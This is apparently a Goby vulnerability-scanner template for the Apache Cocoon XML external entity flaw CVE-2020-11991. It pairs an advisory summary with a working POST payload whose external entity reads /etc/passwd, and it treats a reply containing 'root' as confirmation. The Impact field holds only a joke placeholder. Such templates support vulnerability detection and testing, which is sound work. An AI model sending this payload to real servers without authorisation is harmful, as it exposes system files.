Apache Cocoon Xml 注入 CVE-2020-11991.json
{
"Name": "Apache Cocoon XML Injection CVE-2020-11991",
"Level": "1",
"Tags": [
"XML Injection"
],
"GobyQuery": "app=\"Apache-Cocoon\"",
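"Description": "On September 11, the Apache Software Foundation published a security advisory fixing an XML external entity injection vulnerability in Apache Cocoon (CVE-2020-11991).\n\nApache Cocoon is a Spring-based framework built around the concept of separation of concerns. All processing in this framework is linearly chained through predefined processing components, so that input and generated output are handled in pipeline order. Its users include Apache Lenya, Daisy CMS, Hippo CMS, Mindquarry and others. Apache Cocoon is commonly used as a data extraction, transformation and loading tool, or as a relay for passing data between systems. CVE-2020-11991 relates to StreamGenerator: when StreamGenerator is used, the code parses user-supplied XML. An attacker can use specially crafted XML that includes external system entities to access any file on the server system.\n\nApache Cocoon <= 2.1.12",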
"Product": "Apache Cocoon",
"Homepage": "http://cocoon.apache.org/2.1/",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">Baa baa baa</span>🐑</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/v2/api/product/manger/getInfo",
"follow_redirect": true,
"header": {
"Content-type": "text/xml"
},
"data_type": "text",
"data": "<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-01-22 22:24:01",
"GobyVersion": "1.8.237"
}